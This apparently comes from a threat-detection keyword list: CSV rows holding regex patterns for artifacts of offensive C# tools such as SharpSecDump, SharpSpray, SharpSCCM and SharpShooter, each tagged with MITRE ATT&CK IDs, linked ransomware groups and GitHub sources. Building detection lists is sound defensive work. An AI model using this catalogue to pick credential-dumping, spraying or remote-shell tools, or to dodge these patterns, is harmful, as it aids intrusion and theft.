"*/SharpRODC.git*",".{0,1000}\/SharpRODC\.git.{0,1000}","offensive_tool_keyword","SharpRODC","audit the security of read-only domain controllers","T1012 - T1482 - T1207 - T1208 - T1209 - T1212","TA0007 - TA0008 - TA0006","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpRODC","1","1","N/A","N/A","8","2","115","8","2023-11-27T12:41:52Z","2023-11-24T14:35:49Z","11068"
"*/SharpSAMDump.git*",".{0,1000}\/SharpSAMDump\.git.{0,1000}","offensive_tool_keyword","SharpSAMDump","SAM dumping via the registry in C#/.NET","T1003.002 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/jojonas/SharpSAMDump","1","1","N/A","N/A","10","1","48","8","2025-01-16T07:08:58Z","2024-05-27T10:53:27Z","11069"
"*/SharpSC.exe*",".{0,1000}\/SharpSC\.exe.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","1","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","11070"
"*/SharpSC.git*",".{0,1000}\/SharpSC\.git.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","1","N/A","N/A","8","1","40","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z","11071"
"*/SharpSCCM.exe*",".{0,1000}\/SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11072"
"*/SharpSCCM.exe*",".{0,1000}\/SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11073"
"*/SharpSCCM.exe*",".{0,1000}\/SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11074"
"*/SharpSCCM.exe*",".{0,1000}\/SharpSCCM\.exe.{0,1000}","offensive_tool_keyword","SharpSCCM","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpSCCM","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11075"
"*/SharpSCCM.git*",".{0,1000}\/SharpSCCM\.git.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","11076"
"*/SharpSCCM/releases/download/*",".{0,1000}\/SharpSCCM\/releases\/download\/.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","1","N/A","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","11077"
"*/SharpSCshell.exe*",".{0,1000}\/SharpSCshell\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11078"
"*/SharpSearch.exe*",".{0,1000}\/SharpSearch\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11079"
"*/SharpSearch.exe*",".{0,1000}\/SharpSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11080"
"*/SharpSecDump.exe*",".{0,1000}\/SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11081"
"*/SharpSecDump.exe*",".{0,1000}\/SharpSecDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11082"
"*/SharpSecDump.git*",".{0,1000}\/SharpSecDump\.git.{0,1000}","offensive_tool_keyword","SharpSecDump",".Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py","T1003 - T1558","TA0006","N/A","Dispossessor","Credential Access","https://github.com/G0ldenGunSec/SharpSecDump","1","1","N/A","N/A","10","7","609","74","2023-02-16T18:47:26Z","2020-09-01T04:30:24Z","11083"
"*/SharpShares.exe*",".{0,1000}\/SharpShares\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11084"
"*/SharpShares.exe*",".{0,1000}\/SharpShares\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11085"
"*/SharpShares.exe*",".{0,1000}\/SharpShares\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11086"
"*/SharpShares.git*",".{0,1000}\/SharpShares\.git.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","1","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","11087"
"*/SharpShares/Enums*",".{0,1000}\/SharpShares\/Enums.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","11088"
"*/SharpShares/releases/download/*",".{0,1000}\/SharpShares\/releases\/download\/.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","1","N/A","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","11089"
"*/SharpShares-master*",".{0,1000}\/SharpShares\-master.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","11090"
"*/SharpShellPipe.git*",".{0,1000}\/SharpShellPipe\.git.{0,1000}","offensive_tool_keyword","SharpShellPipe","interactive remote shell access via named pipes and the SMB protocol.","T1056.002 - T1021.002 - T1059.001","TA0005 - TA0009 - TA0002","N/A","N/A","Lateral Movement","https://github.com/DarkCoderSc/SharpShellPipe","1","1","N/A","N/A","8","2","118","14","2025-02-21T12:33:43Z","2023-08-25T15:18:30Z","11091"
"*/SharpShooter.git*",".{0,1000}\/SharpShooter\.git.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","1","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","11092"
"*/Sharp-SMBExec.exe*",".{0,1000}\/Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11093"
"*/Sharp-SMBExec.exe*",".{0,1000}\/Sharp\-SMBExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta - APT20 - PowerPool","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11094"
"*/SharpSniper.exe*",".{0,1000}\/SharpSniper\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11095"
"*/SharpSniper.exe*",".{0,1000}\/SharpSniper\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11096"
"*/SharpSocks*",".{0,1000}\/SharpSocks.{0,1000}","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","1","N/A","N/A","10","10","482","84","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z","11097"
"*/sharpsocks.log*",".{0,1000}\/sharpsocks\.log.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","#logfile #linux","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","11098"
"*/SharpSocksServerCore.dll*",".{0,1000}\/SharpSocksServerCore\.dll.{0,1000}","offensive_tool_keyword","shad0w","A post exploitation framework designed to operate covertly on heavily monitored environments","T1071 - T1090 - T1105 - T1571 - T1001","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/bats3c/shad0w","1","1","N/A","N/A","N/A","10","2090","332","2021-09-29T00:15:36Z","2020-04-28T16:42:07Z","11099"
"*/SharpSphere.exe*",".{0,1000}\/SharpSphere\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11100"
"*/SharpSphere.exe*",".{0,1000}\/SharpSphere\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11101"
"*/SharpSploit*",".{0,1000}\/SharpSploit.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","11102"
"*/SharpSploit.dll*",".{0,1000}\/SharpSploit\.dll.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","11103"
"*/SharpSploit.git*",".{0,1000}\/SharpSploit\.git.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","11104"
"*/SharpSploit/*",".{0,1000}\/SharpSploit\/.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","1","N/A","N/A","10","10","1140","160","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z","11105"
"*/SharpSploitConsole.git*",".{0,1000}\/SharpSploitConsole\.git.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","11106"
"*/SharpSpoolTrigger*",".{0,1000}\/SharpSpoolTrigger.{0,1000}","offensive_tool_keyword","SharpSystemTriggers","Collection of remote authentication triggers in C#","T1078 - T1059.001 - T1550","TA0008 ","N/A","N/A","Lateral Movement","https://github.com/cube0x0/SharpSystemTriggers","1","1","N/A","N/A","10","5","483","57","2024-05-15T21:24:56Z","2021-09-12T18:18:15Z","11107"
"*/SharpSpray.exe*",".{0,1000}\/SharpSpray\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11108"
"*/SharpSpray.exe*",".{0,1000}\/SharpSpray\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11109"
"*/SharpSpray.exe*",".{0,1000}\/SharpSpray\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11110"
"*/SharpSpray.exe*",".{0,1000}\/SharpSpray\.exe.{0,1000}","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","1","N/A","N/A","10","1","90","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z","11111"
"*/sharpspray.exe*",".{0,1000}\/sharpspray\.exe.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","11112"
"*/SharpSpray.git*",".{0,1000}\/SharpSpray\.git.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","11113"
"*/SharpSpray-1.1.zip*",".{0,1000}\/SharpSpray\-1\.1\.zip.{0,1000}","offensive_tool_keyword","SharpSpray","SharpSpray is a Windows domain password spraying tool written in .NET C#","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/iomoath/SharpSpray","1","1","N/A","N/A","10","2","130","21","2021-11-25T19:13:56Z","2021-08-31T16:09:45Z","11114"
"*/SharpSpray1.exe*",".{0,1000}\/SharpSpray1\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11115"
"*/SharpSQL.exe*",".{0,1000}\/SharpSQL\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11116"
"*/SharpSQL.exe*",".{0,1000}\/SharpSQL\.exe.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","11117"
"*/SharpSQLDump.exe*",".{0,1000}\/SharpSQLDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11118"
"*/SharpSQLPwn.exe*",".{0,1000}\/SharpSQLPwn\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11119"
